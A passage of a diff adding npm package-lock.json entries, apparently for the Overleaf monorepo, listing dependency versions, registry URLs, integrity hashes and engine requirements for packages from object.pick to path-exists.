"https://github.com/sponsors/ljharb" + } + }, + "node_modules/object.pick": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/object.pick/-/object.pick-1.3.0.tgz", + "integrity": "sha512-tqa/UMy/CCoYmj+H5qc07qvSL9dqcs/WZENZ1JbtWBlATP+iVOe778gE6MSijnyCnORzDuX6hU+LA4SZ09YjFQ==", + "dev": true, + "dependencies": { + "isobject": "^3.0.1" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/object.values": { + "version": "1.1.6", + "resolved": "https://registry.npmjs.org/object.values/-/object.values-1.1.6.tgz", + "integrity": "sha512-FVVTkD1vENCsAcwNs9k6jea2uHC/X0+JcjG8YA60FN5CMaJmG95wT9jek/xX9nornqGRrBkKtzuAu2wuHpKqvw==", + "dev": true, + "dependencies": { + "call-bind": "^1.0.2", + "define-properties": "^1.1.4", + "es-abstract": "^1.20.4" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/objectorarray": { + "version": "1.0.5", + "resolved": "https://registry.npmjs.org/objectorarray/-/objectorarray-1.0.5.tgz", + "integrity": "sha512-eJJDYkhJFFbBBAxeh8xW+weHlkI28n2ZdQV/J/DNfWfSKlGEf2xcfAbZTv3riEXHAhL9SVOTs2pRmXiSTf78xg==", + "dev": true, + "license": "ISC" + }, + "node_modules/obuf": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/obuf/-/obuf-1.1.2.tgz", + "integrity": "sha512-PX1wu0AmAdPqOL1mWhqmlOd8kOIZQwGZw6rh7uby9fTc5lhaOWFLX3I6R1hrF9k3zUY40e6igsLGkDXK92LJNg==", + "dev": true, + "license": "MIT" + }, + "node_modules/octonode": { + "version": "0.9.5", + "resolved": "https://registry.npmjs.org/octonode/-/octonode-0.9.5.tgz", + "integrity": "sha512-l+aX9jNVkaagh7u/q2QpNKdL8XUagdztl+ebXxBRU6FJ1tpRxAH/ygIuWh0h7eS491BsyH6bb0QZIQEC2+u5oA==", + "dependencies": { + "bluebird": "^3.5.0", + "deep-extend": "^0.6.0", + "randomstring": "^1.1.5", + "request": "^2.72.0" + }, + "engines": { + "node": ">0.4.11" + } + }, + "node_modules/on-finished": { + "version": "2.3.0", + "resolved": "https://registry.npmjs.org/on-finished/-/on-finished-2.3.0.tgz", + "integrity": "sha1-IPEzZIGwg811M3mSoWlxqi2QaUc=", + "dependencies": { + "ee-first": "1.1.1" + }, + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/on-headers": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/on-headers/-/on-headers-1.0.2.tgz", + "integrity": "sha512-pZAE+FJLoyITytdqK0U5s+FIpjN0JP3OzFi/u8Rx+EV5/W+JTWGXG8xFzevE7AjBfDqHv/8vL8qQsIhHnqRkrA==", + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/once": { + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", + "integrity": "sha1-WDsap3WWHUsROsF9nFC6753Xa9E=", + "dependencies": { + "wrappy": "1" + } + }, + "node_modules/onetime": { + "version": "5.1.2", + "resolved": "https://registry.npmjs.org/onetime/-/onetime-5.1.2.tgz", + "integrity": "sha512-kbpaSSGJTWdAY5KPVeMOKXSrPtr8C8C7wodJbcsd51jRnmD+GZu8Y0VoU6Dm5Z4vWr0Ig/1NKuWRKf7j5aaYSg==", + "dev": true, + "dependencies": { + "mimic-fn": "^2.1.0" + }, + "engines": { + "node": ">=6" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/open": { + "version": "8.4.2", + "resolved": "https://registry.npmjs.org/open/-/open-8.4.2.tgz", + "integrity": "sha512-7x81NCL719oNbsq/3mh+hVrAWmFuEYUqrq/Iw3kUzH8ReypT9QQ0BLoJS7/G9k6N81XjW4qHWtjWwe/9eLy1EQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "define-lazy-prop": "^2.0.0", + "is-docker": "^2.1.1", + "is-wsl": "^2.2.0" + }, + "engines": { + "node": ">=12" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/openapi3-ts": { + "version": "3.1.2", + "resolved": "https://registry.npmjs.org/openapi3-ts/-/openapi3-ts-3.1.2.tgz", + "integrity": "sha512-S8fijNOqe/ut0kEDAwHZnI7sVYqb8Q3XnISmSyXmK76jgrcf4ableI75KTY1qdksd9EI/t39Vi5M4VYKrkNKfQ==", + "dependencies": { + "yaml": "^2.1.3" + } + }, + "node_modules/openapi3-ts/node_modules/yaml": { + "version": "2.3.1", + "resolved": "https://registry.npmjs.org/yaml/-/yaml-2.3.1.tgz", + "integrity": "sha512-2eHWfjaoXgTBC2jNM1LRef62VQa0umtvRiDSk6HSzW7RvS5YtkabJrwYLLEKWBc8a5U2PTSCs+dJjUTJdlHsWQ==", + "engines": { + "node": ">= 14" + } + }, + "node_modules/opentracing": { + "version": "0.14.7", + "resolved": "https://registry.npmjs.org/opentracing/-/opentracing-0.14.7.tgz", + "integrity": "sha512-vz9iS7MJ5+Bp1URw8Khvdyw1H/hGvzHWlKQ7eRrQojSCDL1/SrWfrY9QebLw97n2deyRtzHRC3MkQfVNUCo91Q==", + "engines": { + "node": ">=0.10" + } + }, + "node_modules/optionator": { + "version": "0.8.3", + "resolved": "https://registry.npmjs.org/optionator/-/optionator-0.8.3.tgz", + "integrity": "sha512-+IW9pACdk3XWmmTXG8m3upGUJst5XRGzxMRjXzAuJ1XnIFNvfhjjIuYkDvysnPQ7qzqVzLt78BCruntqRhWQbA==", + "dependencies": { + "deep-is": "~0.1.3", + "fast-levenshtein": "~2.0.6", + "levn": "~0.3.0", + "prelude-ls": "~1.1.2", + "type-check": "~0.3.2", + "word-wrap": "~1.2.3" + }, + "engines": { + "node": ">= 0.8.0" + } + }, + "node_modules/optionator/node_modules/levn": { + "version": "0.3.0", + "resolved": "https://registry.npmjs.org/levn/-/levn-0.3.0.tgz", + "integrity": "sha512-0OO4y2iOHix2W6ujICbKIaEQXvFQHue65vUG3pb5EUomzPI90z9hsA1VsO/dbIIpC53J8gxM9Q4Oho0jrCM/yA==", + "dependencies": { + "prelude-ls": "~1.1.2", + "type-check": "~0.3.2" + }, + "engines": { + "node": ">= 0.8.0" + } + }, + "node_modules/optionator/node_modules/prelude-ls": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/prelude-ls/-/prelude-ls-1.1.2.tgz", + "integrity": "sha512-ESF23V4SKG6lVSGZgYNpbsiaAkdab6ZgOxe52p7+Kid3W3u3bxR4Vfd/o21dmN7jSt0IwgZ4v5MUd26FEtXE9w==", + "engines": { + "node": ">= 0.8.0" + } + }, + "node_modules/optionator/node_modules/type-check": { + "version": "0.3.2", + "resolved": "https://registry.npmjs.org/type-check/-/type-check-0.3.2.tgz", + "integrity": "sha512-ZCmOJdvOWDBYJlzAoFkC+Q0+bUyEOS1ltgp1MGU03fqHG+dbi9tBFU2Rd9QKiDZFAYrhPh2JUf7rZRIuHRKtOg==", + "dependencies": { + "prelude-ls": "~1.1.2" + }, + "engines": { + "node": ">= 0.8.0" + } + }, + "node_modules/options": { + "version": "0.0.6", + "resolved": "https://registry.npmjs.org/options/-/options-0.0.6.tgz", + "integrity": "sha512-bOj3L1ypm++N+n7CEbbe473A414AB7z+amKYshRb//iuL3MpdDCLhPnw6aVTdKB9g5ZRVHIEp8eUln6L2NUStg==", + "engines": { + "node": ">=0.4.0" + } + }, + "node_modules/os-tmpdir": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/os-tmpdir/-/os-tmpdir-1.0.2.tgz", + "integrity": "sha1-u+Z0BseaqFxc/sdm/lc0VV36EnQ=", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/ospath": { + "version": "1.2.2", + "resolved": "https://registry.npmjs.org/ospath/-/ospath-1.2.2.tgz", + "integrity": "sha1-EnZjl3Sj+O8lcvf+QoDg6kVQwHs=", + "dev": true + }, + "node_modules/otplib": { + "version": "12.0.1", + "resolved": "https://registry.npmjs.org/otplib/-/otplib-12.0.1.tgz", + "integrity": "sha512-xDGvUOQjop7RDgxTQ+o4pOol0/3xSZzawTiPKRrHnQWAy0WjhNs/5HdIDJCrqC4MBynmjXgULc6YfioaxZeFgg==", + "dependencies": { + "@otplib/core": "^12.0.1", + "@otplib/preset-default": "^12.0.1", + "@otplib/preset-v11": "^12.0.1" + } + }, + "node_modules/overleaf-editor": { + "resolved": "services/history-v1", + "link": true + }, + "node_modules/overleaf-editor-core": { + "resolved": "libraries/overleaf-editor-core", + "link": true + }, + "node_modules/p-event": { + "version": "4.2.0", + "resolved": "https://registry.npmjs.org/p-event/-/p-event-4.2.0.tgz", + "integrity": "sha512-KXatOjCRXXkSePPb1Nbi0p0m+gQAwdlbhi4wQKJPI1HsMQS9g+Sqp2o+QHziPr7eYJyOZet836KoHEVM1mwOrQ==", + "dependencies": { + "p-timeout": "^3.1.0" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/p-finally": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/p-finally/-/p-finally-1.0.0.tgz", + "integrity": "sha1-P7z7FbiZpEEjs0ttzBi3JDNqLK4=", + "engines": { + "node": ">=4" + } + }, + "node_modules/p-limit": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", + "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", + "dependencies": { + "yocto-queue": "^0.1.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/p-locate": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-5.0.0.tgz", + "integrity": "sha512-LaNjtRWUBY++zB5nE/NwcaoMylSPk+S+ZHNB1TzdbMJMny6dynpAGt7X/tl/QYq3TIeE6nxHppbo2LGymrG5Pw==", + "dependencies": { + "p-limit": "^3.0.2" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/p-map": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/p-map/-/p-map-4.0.0.tgz", + "integrity": "sha512-/bjOqmgETBYB5BoEeGVea8dmvHb2m9GLy1E9W43yeyfP6QQCZGFNa+XRceJEuDB6zqr+gKpIAmlLebMpykw/MQ==", + "dependencies": { + "aggregate-error": "^3.0.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/p-props": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/p-props/-/p-props-4.0.0.tgz", + "integrity": "sha512-3iKFbPdoPG7Ne3cMA53JnjPsTMaIzE9gxKZnvKJJivTAeqLEZPBu6zfi6DYq9AsH1nYycWmo3sWCNI8Kz6T2Zg==", + "dependencies": { + "p-map": "^4.0.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/p-queue": { + "version": "8.1.0", + "resolved": "https://registry.npmjs.org/p-queue/-/p-queue-8.1.0.tgz", + "integrity": "sha512-mxLDbbGIBEXTJL0zEx8JIylaj3xQ7Z/7eEVjcF9fJX4DBiH9oqe+oahYnlKKxm0Ci9TlWTyhSHgygxMxjIB2jw==", + "license": "MIT", + "dependencies": { + "eventemitter3": "^5.0.1", + "p-timeout": "^6.1.2" + }, + "engines": { + "node": ">=18" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/p-queue/node_modules/eventemitter3": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/eventemitter3/-/eventemitter3-5.0.1.tgz", + "integrity": "sha512-GWkBvjiSZK87ELrYOSESUYeVIc9mvLLf/nXalMOS5dYrgZq9o5OVkbZAVM06CVxYsCwH9BDZFPlQTlPA1j4ahA==", + "license": "MIT" + }, + "node_modules/p-queue/node_modules/p-timeout": { + "version": "6.1.4", + "resolved": "https://registry.npmjs.org/p-timeout/-/p-timeout-6.1.4.tgz", + "integrity": "sha512-MyIV3ZA/PmyBN/ud8vV9XzwTrNtR4jFrObymZYnZqMmW0zA8Z17vnT0rBgFE/TlohB+YCHqXMgZzb3Csp49vqg==", + "license": "MIT", + "engines": { + "node": ">=14.16" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/p-retry": { + "version": "6.2.1", + "resolved": "https://registry.npmjs.org/p-retry/-/p-retry-6.2.1.tgz", + "integrity": "sha512-hEt02O4hUct5wtwg4H4KcWgDdm+l1bOaEy/hWzd8xtXB9BqxTWBBhb+2ImAtH4Cv4rPjV76xN3Zumqk3k3AhhQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/retry": "0.12.2", + "is-network-error": "^1.0.0", + "retry": "^0.13.1" + }, + "engines": { + "node": ">=16.17" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/p-throttle": { + "version": "4.1.1", + "resolved": "https://registry.npmjs.org/p-throttle/-/p-throttle-4.1.1.tgz", + "integrity": "sha512-TuU8Ato+pRTPJoDzYD4s7ocJYcNSEZRvlxoq3hcPI2kZDZ49IQ1Wkj7/gDJc3X7XiEAAvRGtDzdXJI0tC3IL1g==", + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/p-timeout": { + "version": "3.2.0", + "resolved": "https://registry.npmjs.org/p-timeout/-/p-timeout-3.2.0.tgz", + "integrity": "sha512-rhIwUycgwwKcP9yTOOFK/AKsAopjjCakVqLHePO3CC6Mir1Z99xT+R63jZxAT5lFZLa2inS5h+ZS2GvR99/FBg==", + "dependencies": { + "p-finally": "^1.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/p-try": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/p-try/-/p-try-2.2.0.tgz", + "integrity": "sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==", + "engines": { + "node": ">=6" + } + }, + "node_modules/package-json-from-dist": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/package-json-from-dist/-/package-json-from-dist-1.0.0.tgz", + "integrity": "sha512-dATvCeZN/8wQsGywez1mzHtTlP22H8OEfPrVMLNr4/eGa+ijtLn/6M5f0dY8UKNrC2O9UCU6SSoG3qRKnt7STw==", + "dev": true + }, + "node_modules/packet-reader": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/packet-reader/-/packet-reader-1.0.0.tgz", + "integrity": "sha512-HAKu/fG3HpHFO0AA8WE8q2g+gBJaZ9MG7fcKk+IJPLTGAD6Psw4443l+9DGRbOIh3/aXr7Phy0TjilYivJo5XQ==" + }, + "node_modules/pako": { + "version": "1.0.11", + "resolved": "https://registry.npmjs.org/pako/-/pako-1.0.11.tgz", + "integrity": "sha512-4hLB8Py4zZce5s4yd9XzopqwVv/yGNhV1Bl8NTmCq1763HeK2+EwVTv+leGeL13Dnh2wfbqowVPXCIO0z4taYw==", + "dev": true, + "license": "(MIT AND Zlib)" + }, + "node_modules/param-case": { + "version": "3.0.4", + "resolved": "https://registry.npmjs.org/param-case/-/param-case-3.0.4.tgz", + "integrity": "sha512-RXlj7zCYokReqWpOPH9oYivUzLYZ5vAPIfEmCTNViosC78F8F0H9y7T7gG2M39ymgutxF5gcFEsyZQSph9Bp3A==", + "dev": true, + "dependencies": { + "dot-case": "^3.0.4", + "tslib": "^2.0.3" + } + }, + "node_modules/parent-module": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/parent-module/-/parent-module-1.0.1.tgz", + "integrity": "sha512-GQ2EWRpQV8/o+Aw8YqtfZZPfNRWZYkbidE9k5rpl/hC3vtHHBfGm2Ifi6qWV+coDGkrUKZAxE3Lot5kcsRlh+g==", + "dependencies": { + "callsites": "^3.0.0" + }, + "engines": { + "node": ">=6" + } + }, + "node_modules/parse-data-url": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/parse-data-url/-/parse-data-url-2.0.0.tgz", + "integrity": "sha512-6iXM6OBCHADCN9Bzv5QbWm1v41xSH15kIWE5hAJ9+sdkVM6pJFg+FlLm8n7gZ17pmZv6Wdr3+leXB2Uifxm7kw==", + "dependencies": { + "valid-data-url": "^2.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/parse-duration": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/parse-duration/-/parse-duration-1.1.0.tgz", + "integrity": "sha512-z6t9dvSJYaPoQq7quMzdEagSFtpGu+utzHqqxmpVWNNZRIXnvqyCvn9XsTdh7c/w0Bqmdz3RB3YnRaKtpRtEXQ==" + }, + "node_modules/parse-json": { + "version": "5.2.0", + "resolved": "https://registry.npmjs.org/parse-json/-/parse-json-5.2.0.tgz", + "integrity": "sha512-ayCKvm/phCGxOkYRSCM82iDwct8/EonSEgCSxWxD7ve6jHggsFl4fZVQBPRNgQoKiuV/odhFrGzQXZwbifC8Rg==", + "dev": true, + "dependencies": { + "@babel/code-frame": "^7.0.0", + "error-ex": "^1.3.1", + "json-parse-even-better-errors": "^2.3.0", + "lines-and-columns": "^1.1.6" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/parse-ms": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/parse-ms/-/parse-ms-2.1.0.tgz", + "integrity": "sha512-kHt7kzLoS9VBZfUsiKjv43mr91ea+U05EyKkEtqp7vNbHxmaVuEqN7XxeEVnGrMtYOAxGrDElSi96K7EgO1zCA==", + "engines": { + "node": ">=6" + } + }, + "node_modules/parse-srcset": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/parse-srcset/-/parse-srcset-1.0.2.tgz", + "integrity": "sha1-8r0iH2zJcKk42IVWq8WJyqqiveE=" + }, + "node_modules/parse5": { + "version": "6.0.1", + "resolved": "https://registry.npmjs.org/parse5/-/parse5-6.0.1.tgz", + "integrity": "sha512-Ofn/CTFzRGTTxwpNEs9PP93gXShHcTq255nzRYSKe8AkVpZY7e1fpmTfOyoIvjP5HG7Z2ZM7VS9PPhQGW2pOpw==", + "dev": true + }, + "node_modules/parse5-htmlparser2-tree-adapter": { + "version": "6.0.1", + "resolved": "https://registry.npmjs.org/parse5-htmlparser2-tree-adapter/-/parse5-htmlparser2-tree-adapter-6.0.1.tgz", + "integrity": "sha512-qPuWvbLgvDGilKc5BoicRovlT4MtYT6JfJyBOMDsKoiT+GiuP5qyrPCnR9HcPECIJJmZh5jRndyNThnhhb/vlA==", + "dev": true, + "dependencies": { + "parse5": "^6.0.1" + } + }, + "node_modules/parseurl": { + "version": "1.3.3", + "resolved": "https://registry.npmjs.org/parseurl/-/parseurl-1.3.3.tgz", + "integrity": "sha512-CiyeOxFT/JZyN5m0z9PfXw4SCBJ6Sygz1Dpl0wqjlhDEGGBP1GnsUVEL0p63hoG1fcj3fHynXi9NYO4nWOL+qQ==", + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/pascal-case": { + "version": "3.1.2", + "resolved": "https://registry.npmjs.org/pascal-case/-/pascal-case-3.1.2.tgz", + "integrity": "sha512-uWlGT3YSnK9x3BQJaOdcZwrnV6hPpd8jFH1/ucpiLRPh/2zCVJKS19E4GvYHvaCcACn3foXZ0cLB9Wrx1KGe5g==", + "dev": true, + "dependencies": { + "no-case": "^3.0.4", + "tslib": "^2.0.3" + } + }, + "node_modules/pascalcase": { + "version": "0.1.1", + "resolved": "https://registry.npmjs.org/pascalcase/-/pascalcase-0.1.1.tgz", + "integrity": "sha512-XHXfu/yOQRy9vYOtUDVMN60OEJjW013GoObG1o+xwQTpB9eYJX/BjXMsdW13ZDPruFhYYn0AG22w0xgQMwl3Nw==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/passport": { + "version": "0.6.0", + "resolved": "https://registry.npmjs.org/passport/-/passport-0.6.0.tgz", + "integrity": "sha512-0fe+p3ZnrWRW74fe8+SvCyf4a3Pb2/h7gFkQ8yTJpAO50gDzlfjZUZTO1k5Eg9kUct22OxHLqDZoKUWRHOh9ug==", + "dependencies": { + "passport-strategy": "1.x.x", + "pause": "0.0.1", + "utils-merge": "^1.0.1" + }, + "engines": { + "node": ">= 0.4.0" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/jaredhanson" + } + }, + "node_modules/passport-google-oauth20": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/passport-google-oauth20/-/passport-google-oauth20-2.0.0.tgz", + "integrity": "sha512-KSk6IJ15RoxuGq7D1UKK/8qKhNfzbLeLrG3gkLZ7p4A6DBCcv7xpyQwuXtWdpyR0+E0mwkpjY1VfPOhxQrKzdQ==", + "dependencies": { + "passport-oauth2": "1.x.x" + }, + "engines": { + "node": ">= 0.4.0" + } + }, + "node_modules/passport-ldapauth": { + "version": "2.1.4", + "resolved": "https://registry.npmjs.org/passport-ldapauth/-/passport-ldapauth-2.1.4.tgz", + "integrity": "sha512-VeVL69ZK+cpJe0DKMSGuwcf7k+V4dr0U0Y7ZhXL785pcRb5gRA6qYZfIH+XTsAzwqTK9l0Dn3Ds4weOZ1jKkLQ==", + "dependencies": { + "@types/node": "*", + "@types/passport": "^1.0.0", + "ldapauth-fork": "^4.3.2", + "passport-strategy": "^1.0.0" + }, + "engines": { + "node": ">=0.8.0" + } + }, + "node_modules/passport-local": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/passport-local/-/passport-local-1.0.0.tgz", + "integrity": "sha1-H+YyaMkudWBmJkN+O5BmYsFbpu4=", + "dependencies": { + "passport-strategy": "1.x.x" + }, + "engines": { + "node": ">= 0.4.0" + } + }, + "node_modules/passport-oauth2": { + "version": "1.6.1", + "resolved": "https://registry.npmjs.org/passport-oauth2/-/passport-oauth2-1.6.1.tgz", + "integrity": "sha512-ZbV43Hq9d/SBSYQ22GOiglFsjsD1YY/qdiptA+8ej+9C1dL1TVB+mBE5kDH/D4AJo50+2i8f4bx0vg4/yDDZCQ==", + "dependencies": { + "base64url": "3.x.x", + "oauth": "0.9.x", + "passport-strategy": "1.x.x", + "uid2": "0.0.x", + "utils-merge": "1.x.x" + }, + "engines": { + "node": ">= 0.4.0" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/jaredhanson" + } + }, + "node_modules/passport-orcid": { + "version": "0.0.4", + "resolved": "https://registry.npmjs.org/passport-orcid/-/passport-orcid-0.0.4.tgz", + "integrity": "sha512-swqn1PIQpzAz0qHXwlBlBaRFkfYXsXJ9o33T11QykCuuxR/UppbHGPgBOnrZaIf/Mytq6uYn8s5C4lAahaMYxQ==", + "dependencies": { + "passport-oauth2": "^1.5.0" + } + }, + "node_modules/passport-strategy": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/passport-strategy/-/passport-strategy-1.0.0.tgz", + "integrity": "sha1-tVOaqPwiWj0a0XlHbd8ja0QPUuQ=", + "engines": { + "node": ">= 0.4.0" + } + }, + "node_modules/patch-package": { + "version": "8.0.0", + "resolved": "https://registry.npmjs.org/patch-package/-/patch-package-8.0.0.tgz", + "integrity": "sha512-da8BVIhzjtgScwDJ2TtKsfT5JFWz1hYoBl9rUQ1f38MC2HwnEIkK8VN3dKMKcP7P7bvvgzNDbfNHtx3MsQb5vA==", + "dependencies": { + "@yarnpkg/lockfile": "^1.1.0", + "chalk": "^4.1.2", + "ci-info": "^3.7.0", + "cross-spawn": "^7.0.3", + "find-yarn-workspace-root": "^2.0.0", + "fs-extra": "^9.0.0", + "json-stable-stringify": "^1.0.2", + "klaw-sync": "^6.0.0", + "minimist": "^1.2.6", + "open": "^7.4.2", + "rimraf": "^2.6.3", + "semver": "^7.5.3", + "slash": "^2.0.0", + "tmp": "^0.0.33", + "yaml": "^2.2.2" + }, + "bin": { + "patch-package": "index.js" + }, + "engines": { + "node": ">=14", + "npm": ">5" + } + }, + "node_modules/patch-package/node_modules/ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dependencies": { + "color-convert": "^2.0.1" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "node_modules/patch-package/node_modules/chalk": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", + "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", + "dependencies": { + "ansi-styles": "^4.1.0", + "supports-color": "^7.1.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/chalk?sponsor=1" + } + }, + "node_modules/patch-package/node_modules/fs-extra": { + "version": "9.1.0", + "resolved": "https://registry.npmjs.org/fs-extra/-/fs-extra-9.1.0.tgz", + "integrity": "sha512-hcg3ZmepS30/7BSFqRvoo3DOMQu7IjqxO5nCDt+zM9XWjb33Wg7ziNT+Qvqbuc3+gWpzO02JubVyk2G4Zvo1OQ==", + "dependencies": { + "at-least-node": "^1.0.0", + "graceful-fs": "^4.2.0", + "jsonfile": "^6.0.1", + "universalify": "^2.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/patch-package/node_modules/lru-cache": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", + "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", + "dependencies": { + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/patch-package/node_modules/open": { + "version": "7.4.2", + "resolved": "https://registry.npmjs.org/open/-/open-7.4.2.tgz", + "integrity": "sha512-MVHddDVweXZF3awtlAS+6pgKLlm/JgxZ90+/NBurBoQctVOOB/zDdVjcyPzQ+0laDGbsWgrRkflI65sQeOgT9Q==", + "dependencies": { + "is-docker": "^2.0.0", + "is-wsl": "^2.1.1" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/patch-package/node_modules/rimraf": { + "version": "2.7.1", + "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-2.7.1.tgz", + "integrity": "sha512-uWjbaKIK3T1OSVptzX7Nl6PvQ3qAGtKEtVRjRuazjfL3Bx5eI409VZSqgND+4UNnmzLVdPj9FqFJNPqBZFve4w==", + "dependencies": { + "glob": "^7.1.3" + }, + "bin": { + "rimraf": "bin.js" + } + }, + "node_modules/patch-package/node_modules/semver": { + "version": "7.6.0", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.0.tgz", + "integrity": "sha512-EnwXhrlwXMk9gKu5/flx5sv/an57AkRplG3hTK68W7FRDN+k+OWBj65M7719OkA82XLBxrcX0KSHj+X5COhOVg==", + "dependencies": { + "lru-cache": "^6.0.0" + }, + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/patch-package/node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/patch-package/node_modules/tmp": { + "version": "0.0.33", + "resolved": "https://registry.npmjs.org/tmp/-/tmp-0.0.33.tgz", + "integrity": "sha512-jRCJlojKnZ3addtTOjdIqoRuPEKBvNXcGYqzO6zWZX8KfKEpnGY5jfggJQ3EjKuu8D4bJRr0y+cYJFmYbImXGw==", + "dependencies": { + "os-tmpdir": "~1.0.2" + }, + "engines": { + "node": ">=0.6.0" + } + }, + "node_modules/patch-package/node_modules/yallist": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" + }, + "node_modules/patch-package/node_modules/yaml": { + "version": "2.3.4", + "resolved": "https://registry.npmjs.org/yaml/-/yaml-2.3.4.tgz", + "integrity": "sha512-8aAvwVUSHpfEqTQ4w/KMlf3HcRdt50E5ODIQJBw1fQ5RL34xabzxtUlzTXVqc4rkZsPbvrXKWnABCD7kWSmocA==", + "engines": { + "node": ">= 14" + } + }, + "node_modules/path-browserify": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/path-browserify/-/path-browserify-1.0.1.tgz", + "integrity": "sha512-b7uo2UCUOYZcnF/3ID0lulOJi/bafxa1xPe7ZPsammBSpjSWQkjNxlt635YGS2MiR9GjvuXCtz2emr3jbsz98g==" + }, + "node_modules/path-exists": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz", + "integrity": 